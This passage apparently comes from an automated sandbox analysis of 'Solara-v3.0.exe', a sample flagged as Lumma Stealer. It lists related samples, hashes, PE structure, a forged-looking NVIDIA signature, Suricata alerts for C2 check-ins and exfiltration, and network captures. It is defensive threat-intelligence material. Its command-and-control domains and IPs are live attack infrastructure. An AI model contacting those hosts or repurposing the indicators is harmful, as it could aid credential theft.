                                                                                                                                                                                                                                            Vq50tK1Nx2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            IzDjbVdHha.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 172.67.157.254
                                                                                                                                                                                                                                            T4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            • 172.67.157.254
                                                                                                                                                                                                                                            FXdg37pY22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            steamcommunity.comScript.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Neverlose.cc-unpadded.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Installer.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Installer.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.121.10.34
                                                                                                                                                                                                                                            SoftWare(1).exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            ForcesLangi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 92.122.104.90
                                                                                                                                                                                                                                            Leside-.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 92.122.104.90
                                                                                                                                                                                                                                            Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.121.10.34

                                                                                                                                                                                                                                            ASNs

                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            AKAMAI-ASN1EUScript.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Neverlose.cc-unpadded.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Installer.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            w22319us3M.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            T4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            FXdg37pY22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            FXdg37pY22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            CLOUDFLARENETUSScript.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            48.252.190.9.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.21.95.219
                                                                                                                                                                                                                                            https://haleborealis.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.22.72.81
                                                                                                                                                                                                                                            External2.4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.29.252
                                                                                                                                                                                                                                            Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            soft 1.14.exeGet hashmaliciousMeduza StealerBrowse
                                                                                                                                                                                                                                            • 104.26.13.205
                                                                                                                                                                                                                                            Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.30.13
                                                                                                                                                                                                                                            https://www.dropbox.com/scl/fi/lncgsm76k7l5ix7fuu5t6/2024-OK-House-Outreach.pdf?rlkey=o4qr50zpdw1z14o6ikdg6zjt8&st=lrloyzlo&dl=0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 172.67.216.74
                                                                                                                                                                                                                                            New Upd v1.1.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.92.91
                                                                                                                                                                                                                                            WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.30.13

                                                                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            a0e9f5d64349fb13191bc781f81f42e1Script.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Neverlose.cc-unpadded.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            External2.4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            New Upd v1.1.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Installer.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Installer.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            • 23.55.153.106

                                                                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                                                                            No context

                                                                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                                                                            \Device\ConDrv

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\Solara-v3.0.exe
                                                                                                                                                                                                                                            File Type:assembler source, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):14402
                                                                                                                                                                                                                                            Entropy (8bit):4.874636730022465
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:vlICCmV5fTMzsM3qlICCmV5fTMzsM3ip9guFx2rBhiLfmfU:vGCC+dMOGCC+dMY9guFx2rBo
                                                                                                                                                                                                                                            MD5:DF0EFD0545733561C6E165770FB3661C
                                                                                                                                                                                                                                            SHA1:0F3AD477176CF235C6C59EE2EB15D81DCB6178A8
                                                                                                                                                                                                                                            SHA-256:A434B406E97A2C892FA88C3975D8181EBEA62A8DA919C5221409E425DF50FD17
                                                                                                                                                                                                                                            SHA-512:3FF527435BC8BCF2640E0B64725CC0DB8A801D912698D4D94C44200529268B80AA7B59A2E2A2EA6C4621E09AA249AAA3583A8D90E4F5D7B68E0E6FFFEB759918
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                            Preview:AcquireSRWLockExclusive..AcquireSRWLockShared..ActivateActCtx..ActivateActCtxWorker..AddAtomA..AddAtomW..AddConsoleAliasA..AddConsoleAliasW..AddDllDirectory..AddIntegrityLabelToBoundaryDescriptor..AddLocalAlternateComputerNameA..AddLocalAlternateComputerNameW..AddRefActCtx..AddRefActCtxWorker..AddResourceAttributeAce..AddSIDToBoundaryDescriptor..AddScopedPolicyIDAce..AddSecureMemoryCacheCallback..AddVectoredContinueHandler..AddVectoredExceptionHandler..AdjustCalendarDate..AllocConsole..AllocateUserPhysicalPages..AllocateUserPhysicalPagesNuma..AppPolicyGetClrCompat..AppPolicyGetCreateFileAccess..AppPolicyGetLifecycleManagement..AppPolicyGetMediaFoundationCodecLoading..AppPolicyGetProcessTerminationMethod..AppPolicyGetShowDeveloperDiagnostic..AppPolicyGetThreadInitializationType..AppPolicyGetWindowingModel..AppXGetOSMaxVersionTested..ApplicationRecoveryFinished..ApplicationRecoveryInProgress..AreFileApisANSI..AssignProcessToJobObject..AttachConsole..BackupRead..BackupSeek..BackupWrite..B

                                                                                                                                                                                                                                            Static File Info

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Entropy (8bit):7.565396215180505
                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                            File name:Solara-v3.0.exe
                                                                                                                                                                                                                                            File size:567'848 bytes
                                                                                                                                                                                                                                            MD5:ac461b5d5ac030c7cc5c2f48efc44668
                                                                                                                                                                                                                                            SHA1:86ed7c32e2539962ad29e046775025d9ec6ffdd6
                                                                                                                                                                                                                                            SHA256:65f1f08a9fbd495e5544503df844e89d6ea7fdcad4a5cb56236fc10b624173be
                                                                                                                                                                                                                                            SHA512:fb405b748b7f0796e4827a569c4d3af12a33c21c1dd2d7ba678256d53766ca0c57da70197b451173c0706ec21d0108dc25499263cae3d09afb6ad747027f82fc
                                                                                                                                                                                                                                            SSDEEP:12288:yYO6Dqzihouxpa+yWTKbuQ4bUJRNds4bYgCJPEO:zO6DThou2+yDbZkUJ3dsuIPt
                                                                                                                                                                                                                                            TLSH:0DC4E1527691C0B2C5531A764A75D7795A3EFC200F22AAC793984BFDDEB02C14F31A2E
                                                                                                                                                                                                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....ng..........................................@..................................o....@.................................|j..<..

                                                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                                                            Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Entrypoint:0x4104a0
                                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                            Subsystem:windows cui
                                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                            Time Stamp:0x676E98E6 [Fri Dec 27 12:09:10 2024 UTC]
                                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                                            Import Hash:96d90e8808da099bc17e050394f447e7

                                                                                                                                                                                                                                            Authenticode Signature

                                                                                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                                                                                            Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                            Error Number:-2146869232
                                                                                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                                                                                            • 12/01/2023 19:00:00 16/01/2026 18:59:59
                                                                                                                                                                                                                                            Subject Chain
                                                                                                                                                                                                                                            • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
                                                                                                                                                                                                                                            Version:3
                                                                                                                                                                                                                                            Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
                                                                                                                                                                                                                                            Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
                                                                                                                                                                                                                                            Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
                                                                                                                                                                                                                                            Serial:0997C56CAA59055394D9A9CDB8BEEB56

                                                                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                                            call 00007F42A0855E0Ah
                                                                                                                                                                                                                                            jmp 00007F42A0855C6Dh
                                                                                                                                                                                                                                            mov ecx, dword ptr [0043B680h]
                                                                                                                                                                                                                                            push esi
                                                                                                                                                                                                                                            push edi
                                                                                                                                                                                                                                            mov edi, BB40E64Eh
                                                                                                                                                                                                                                            mov esi, FFFF0000h
                                                                                                                                                                                                                                            cmp ecx, edi
                                                                                                                                                                                                                                            je 00007F42A0855E06h
                                                                                                                                                                                                                                            test esi, ecx
                                                                                                                                                                                                                                            jne 00007F42A0855E28h
                                                                                                                                                                                                                                            call 00007F42A0855E31h
                                                                                                                                                                                                                                            mov ecx, eax
                                                                                                                                                                                                                                            cmp ecx, edi
                                                                                                                                                                                                                                            jne 00007F42A0855E09h
                                                                                                                                                                                                                                            mov ecx, BB40E64Fh
                                                                                                                                                                                                                                            jmp 00007F42A0855E10h
                                                                                                                                                                                                                                            test esi, ecx
                                                                                                                                                                                                                                            jne 00007F42A0855E0Ch
                                                                                                                                                                                                                                            or eax, 00004711h
                                                                                                                                                                                                                                            shl eax, 10h
                                                                                                                                                                                                                                            or ecx, eax
                                                                                                                                                                                                                                            mov dword ptr [0043B680h], ecx
                                                                                                                                                                                                                                            not ecx
                                                                                                                                                                                                                                            pop edi
                                                                                                                                                                                                                                            mov dword ptr [0043B6C0h], ecx
                                                                                                                                                                                                                                            pop esi
                                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                                                            sub esp, 14h
                                                                                                                                                                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                            xorps xmm0, xmm0
                                                                                                                                                                                                                                            push eax
                                                                                                                                                                                                                                            movlpd qword ptr [ebp-0Ch], xmm0
                                                                                                                                                                                                                                            call dword ptr [00436D00h]
                                                                                                                                                                                                                                            mov eax, dword ptr [ebp-08h]
                                                                                                                                                                                                                                            xor eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                            mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                            call dword ptr [00436CB8h]
                                                                                                                                                                                                                                            xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                            call dword ptr [00436CB4h]
                                                                                                                                                                                                                                            xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                            lea eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                            push eax
                                                                                                                                                                                                                                            call dword ptr [00436D50h]
                                                                                                                                                                                                                                            mov eax, dword ptr [ebp-10h]
                                                                                                                                                                                                                                            lea ecx, dword ptr [ebp-04h]
                                                                                                                                                                                                                                            xor eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                            xor eax, dword ptr [ebp-04h]
                                                                                                                                                                                                                                            xor eax, ecx
                                                                                                                                                                                                                                            leave
                                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                                            mov eax, 00004000h
                                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                                            push 0043CF48h
                                                                                                                                                                                                                                            call dword ptr [00436D28h]
                                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                                            push 00030000h
                                                                                                                                                                                                                                            push 00010000h
                                                                                                                                                                                                                                            push 00000000h
                                                                                                                                                                                                                                            call 00007F42A085CBE3h
                                                                                                                                                                                                                                            add esp, 0Ch

                                                                                                                                                                                                                                            Data Directories

                                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x36a7c0x3c.rdata
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x8d0000x3fc.rsrc
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x884000x2628.bss
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x3f0000x2744.reloc
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x326080x18.rdata
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2ea980xc0.rdata
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x36c3c0x184.rdata
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                            Sections

                                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                            .text0x10000x2b4ca0x2b600ebf84c6b836020b1a66433a898baeab7False0.5443702719740634data6.596404756541432IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            .rdata0x2d0000xc50c0xc60096e76e7ef084461591b1dcd4c2131f05False0.40260022095959597data4.741850626178578IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            .data0x3a0000x37140x2800d87fd4546a2b39263a028b496b33108fFalse0.29814453125data5.024681407682101IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                            .tls0x3e0000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                            .reloc0x3f0000x27440x2800c7508b57e36483307c47b7dd73fc0c85False0.75166015625data6.531416896423856IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            .bss0x420000x4ac000x4ac002da6d61cb00d0efd06baee91a3464b4cFalse1.0003298756270902data7.999402791741808IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                            .rsrc0x8d0000x3fc0x4006a4851071664eb0d5787860b0928a2faFalse0.4443359375data3.391431520369637IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                            Resources

                                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                            RT_VERSION0x8d0580x3a4dataEnglishUnited States0.44849785407725323

                                                                                                                                                                                                                                            Imports

                                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                                            KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CloseThreadpoolWork, CompareStringW, CreateFileW, CreateThread, CreateThreadpoolWork, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, FreeLibraryWhenCallbackReturns, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetConsoleWindow, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitOnceBeginInitialize, InitOnceComplete, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, SubmitThreadpoolWork, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WaitForSingleObjectEx, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                                                                                                                                                                            USER32.dllShowWindow

                                                                                                                                                                                                                                            Possible Origin

                                                                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                            EnglishUnited States

                                                                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                            2024-12-28T02:54:56.855361+01002058582ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mindhandru .buzz)1192.168.2.5497761.1.1.153UDP
                                                                                                                                                                                                                                            2024-12-28T02:54:56.997814+01002058584ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz)1192.168.2.5574311.1.1.153UDP
                                                                                                                                                                                                                                            2024-12-28T02:54:57.140993+01002058586ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz)1192.168.2.5577001.1.1.153UDP
                                                                                                                                                                                                                                            2024-12-28T02:54:57.283504+01002058588ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz)1192.168.2.5554781.1.1.153UDP
                                                                                                                                                                                                                                            2024-12-28T02:54:57.422764+01002058580ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz)1192.168.2.5567621.1.1.153UDP
                                                                                                                                                                                                                                            2024-12-28T02:54:57.564017+01002058590ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz)1192.168.2.5617621.1.1.153UDP
                                                                                                                                                                                                                                            2024-12-28T02:54:57.703572+01002058572ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz)1192.168.2.5496141.1.1.153UDP
                                                                                                                                                                                                                                            2024-12-28T02:54:57.846935+01002058576ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz)1192.168.2.5503521.1.1.153UDP
                                                                                                                                                                                                                                            2024-12-28T02:54:57.993945+01002058578ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz)1192.168.2.5555041.1.1.153UDP
                                                                                                                                                                                                                                            2024-12-28T02:54:59.800180+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54970823.55.153.106443TCP
                                                                                                                                                                                                                                            2024-12-28T02:55:00.570475+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.54970823.55.153.106443TCP
                                                                                                                                                                                                                                            2024-12-28T02:55:02.189349+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549709104.21.66.86443TCP
                                                                                                                                                                                                                                            2024-12-28T02:55:02.927391+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549709104.21.66.86443TCP
                                                                                                                                                                                                                                            2024-12-28T02:55:02.927391+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549709104.21.66.86443TCP
                                                                                                                                                                                                                                            2024-12-28T02:55:04.234024+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549710104.21.66.86443TCP
                                                                                                                                                                                                                                            2024-12-28T02:55:05.008074+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549710104.21.66.86443TCP
                                                                                                                                                                                                                                            2024-12-28T02:55:05.008074+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549710104.21.66.86443TCP
                                                                                                                                                                                                                                            2024-12-28T02:55:06.674165+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549711104.21.66.86443TCP
                                                                                                                                                                                                                                            2024-12-28T02:55:07.625903+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549711104.21.66.86443TCP
                                                                                                                                                                                                                                            2024-12-28T02:55:08.988622+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549712104.21.66.86443TCP
                                                                                                                                                                                                                                            2024-12-28T02:55:11.790231+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549713104.21.66.86443TCP
                                                                                                                                                                                                                                            2024-12-28T02:55:14.249228+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549714104.21.66.86443TCP
                                                                                                                                                                                                                                            2024-12-28T02:55:16.798762+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549719104.21.66.86443TCP
                                                                                                                                                                                                                                            2024-12-28T02:55:20.536647+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549727104.21.66.86443TCP
                                                                                                                                                                                                                                            2024-12-28T02:55:21.336316+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549727104.21.66.86443TCP

                                                                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:58.361090899 CET49708443192.168.2.523.55.153.106
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:58.361149073 CET4434970823.55.153.106192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:58.361226082 CET49708443192.168.2.523.55.153.106
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:58.363667965 CET49708443192.168.2.523.55.153.106
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:58.363682985 CET4434970823.55.153.106192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:59.799998999 CET4434970823.55.153.106192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:59.800179958 CET49708443192.168.2.523.55.153.106
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:59.804109097 CET49708443192.168.2.523.55.153.106
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:59.804119110 CET4434970823.55.153.106192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:59.804419994 CET4434970823.55.153.106192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:59.845571041 CET49708443192.168.2.523.55.153.106
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:59.883636951 CET49708443192.168.2.523.55.153.106
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:59.931324005 CET4434970823.55.153.106192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.570502996 CET4434970823.55.153.106192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.570530891 CET4434970823.55.153.106192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.570554972 CET4434970823.55.153.106192.168.2.5
